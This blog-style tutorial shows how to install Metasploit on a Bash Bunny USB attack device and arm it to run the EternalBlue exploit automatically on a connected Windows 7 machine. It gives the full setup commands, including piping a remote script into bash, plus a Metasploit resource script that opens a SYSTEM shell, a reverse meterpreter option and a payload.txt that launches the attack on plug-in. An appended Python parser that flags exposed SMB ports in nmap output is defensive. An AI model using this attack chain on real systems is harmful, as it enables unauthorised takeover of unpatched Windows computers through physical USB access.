I have finally got the Bashbunny from HAK5, and I can say this is really an Imperial Star Destroyer compared to the Teensy++ 2.0 A-Wing that I used 6 years ago.
The Bashbunny is capable of running the Metasploit framework: it has 512 MB RAM, an ARMv7 CPU (v7l) and 3 GB of internal flash storage.
The Eternalblue exploit that has been ported to the Metasploit framework is an ideal candidate for automatic exploitation from the Bashbunny. A true hacking device :)
So let's first prepare the Bashbunny device (make sure you can ssh to the device and set up internet connection sharing; the setup is covered here). I have done all the setup on a Linux system.
We need to prepare a couple of things in order to be able to run Metasploit on the Bashbunny, so here are the rough steps I followed.

Make sure to set some date for TLS/SSL to work ;)

    # date -s "20170523"

Add this to /etc/apt/sources.list:

    deb http://http.us.debian.org/debian/ jessie-updates main

Install the build dependencies:

    # apt-get update
    # apt-get -y install autoconf bison build-essential curl git-core libapr1 libaprutil1 libcurl4-openssl-dev libgmp3-dev libpcap-dev libpq-dev libreadline6-dev libsqlite3-dev libssl-dev libsvn1 libtool libxml2 libxml2-dev libxslt-dev libyaml-dev locate ncurses-dev openssl wget xsel zlib1g zlib1g-dev

Install Ruby 2.3.3 via RVM:

    # curl -sSL https://get.rvm.io | bash -s stable
    # source /etc/profile.d/rvm.sh
    # rvm requirements
    # rvm list known
    # rvm install 2.3.3
    # vi /root/.bashrc

Add at the end of /root/.bashrc:

    source /etc/profile.d/rvm.sh
    rvm use 2.3.3 --default

Fetch and run the Metasploit installer, then update:

    # mkdir /root/METASPLOIT
    # cd /root/METASPLOIT/
    # wget https://raw.githubusercontent.com/iam1980/metasploit-vps-installer/master/msf_vps_installer.sh
    # chmod +x msf_vps_installer.sh
    # ./msf_vps_installer.sh
    # git config --global user.name "USER"
    # git config --global user.email "user@example.com"
    # ./msfupdate
You should be able to run Metasploit on the Bashbunny now.
Now that we have a working Metasploit on the Bashbunny, all that is really needed is to arm it and load the eternalblue exploit via a Metasploit RC script. Here is an example script, eternal-cmd.rc (the remote IP is the default address that dhcpd will assign to the target system you connect the Bashbunny to).

Check /etc/dhcp/dhcpd.conf first: the default pool is

    range 172.16.64.10 172.16.64.12;

Set it to a single address so the target always gets the same IP:

    range 172.16.64.64 172.16.64.64;

eternal-cmd.rc:

    use exploit/windows/smb/ms17_010_eternalblue
    set PAYLOAD windows/x64/exec
    set RHOST 172.16.64.64
    set CMD cmd.exe
    exploit
The above is ideal when we want an NT AUTHORITY\SYSTEM shell on the target Windows 7 SP1 x64 (unlocked).
If the target is locked we can use another payload; something like windows/x64/meterpreter/reverse_https would be ideal, as we already know the LHOST value for the Bashbunny: RHOST would again be 172.16.64.64 and LHOST 172.16.64.1. This can easily be scripted via a Metasploit RC script ;)
The Metasploit RC scripts should be placed in /root/metasploit-framework on the Bashbunny so we can call them from the payload.txt of the corresponding attack switch position.
So ideally the payload.txt (switch1 or switch2) would look like this:

    #!/bin/bash
    LED SETUP
    ATTACKMODE RNDIS_ETHERNET
    # Set some current time ..... check your watch
    date -s "20170523 23:23"
    LED ATTACK
    /root/metasploit-framework/msfconsole -r /root/metasploit-framework/eternal-cmd.rc &
    LED FINISH
The target Windows 7 must have SMB port 445 reachable from the USB network that the Bashbunny creates. A default Windows system has the firewall on, so the attack won't work because the port is blocked. For demonstration purposes we assume the firewall is off.
After a while you should get an NT AUTHORITY\SYSTEM cmd shell popping up on your Win 7 desktop :)
This is an nmap scan after the successful Eternalblue attack on the target Windows 7:
    Host is up, received arp-response (0.0014s latency).
    Scanned at 2017-05-23 23:09:43 for 149s
    Not shown: 990 closed ports
    Reason: 990 resets
    PORT      STATE SERVICE      REASON          VERSION
    135/tcp   open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
    139/tcp   open  netbios-ssn  syn-ack ttl 128 Microsoft Windows netbios-ssn
    445/tcp   open  microsoft-ds syn-ack ttl 128 Microsoft Windows 7 - 10 microsoft-ds
    5357/tcp  open  http         syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    49152/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
    49153/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
    49154/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
    49155/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
    49156/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
    49157/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
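As an added example that is not part of the original post, here is a small Python parser for the port table in nmap's normal output, such as the scan above, used from the defensive side: it turns the rows into records and flags hosts that expose SMB (139/445 tcp) to the interface the scan came from, which is the precondition the post relies on and exactly what an inventory of machines exposed to an untrusted USB network should catch. The sample input is the post's scan embedded inline; the function and record names (parse_nmap_ports, PortRecord, smb_exposed and so on) are my own and the parser reads the header line to decide whether a REASON column is present, so it also handles plain scans run without --reason.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: the nmap normal output quoted in the post, embedded so this runs offline.
SAMPLE_SCAN = """\
Host is up, received arp-response (0.0014s latency).
Scanned at 2017-05-23 23:09:43 for 149s
Not shown: 990 closed ports
Reason: 990 resets
PORT      STATE SERVICE      REASON          VERSION
135/tcp   open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 128 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack ttl 128 Microsoft Windows 7 - 10 microsoft-ds
5357/tcp  open  http         syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
49153/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
49154/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
49155/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
49156/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
49157/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
"""

# A port-table row: "<port>/<proto>  <state>  <service>  [<reason> [ttl N]] [<version ...>]"
ROW = re.compile(r"^(\d+)/(tcp|udp|sctp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
TTL = re.compile(r"^ttl\s+(\d+)\s*(.*)$")


@dataclass
class PortRecord:
    port: int
    proto: str
    state: str
    service: str
    reason: Optional[str]   # only present when nmap ran with --reason
    ttl: Optional[int]
    version: str            # empty when no -sV banner was printed


def parse_nmap_ports(text: str) -> List[PortRecord]:
    """Parse the port table of nmap's normal output.

    The header line decides whether a REASON column exists, so on a plain
    scan the version banner is never mistaken for a reason token."""
    records: List[PortRecord] = []
    has_reason = False
    for line in text.splitlines():
        if line.startswith("PORT"):
            has_reason = "REASON" in line
            continue
        m = ROW.match(line)
        if not m:
            continue  # "Host is up", "Not shown", blank lines, ...
        port, proto, state, service, rest = m.groups()
        rest = (rest or "").strip()
        reason: Optional[str] = None
        ttl: Optional[int] = None
        if has_reason and rest:
            reason, _, rest = rest.partition(" ")
            t = TTL.match(rest.strip())
            if t:
                ttl, rest = int(t.group(1)), t.group(2)
        records.append(PortRecord(int(port), proto, state, service, reason, ttl, rest.strip()))
    return records


def open_tcp_ports(records: List[PortRecord]) -> List[int]:
    return sorted(r.port for r in records if r.proto == "tcp" and r.state == "open")


SMB_PORTS = (139, 445)


def smb_exposed(records: List[PortRecord]) -> List[int]:
    """SMB listeners reachable from the scanning interface; 445/tcp open on an
    unpatched host is the exposure a USB-network attack like the post's needs."""
    return [p for p in open_tcp_ports(records) if p in SMB_PORTS]


def looks_like_windows(records: List[PortRecord]) -> bool:
    return any("Windows" in r.version for r in records if r.state == "open")


if __name__ == "__main__":
    recs = parse_nmap_ports(SAMPLE_SCAN)
    print("open tcp ports:", open_tcp_ports(recs))
    print("SMB exposed on:", smb_exposed(recs), "| Windows banner:", looks_like_windows(recs))
```

Run against the post's scan it reports SMB exposed on 139 and 445 with a Windows banner, which is the combination to hunt for in the output of a scan taken from the same kind of unidentified network a plugged-in USB Ethernet gadget would land on.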
Here is a short demo (done in VirtualBox, which simulates the actual Bashbunny attack).
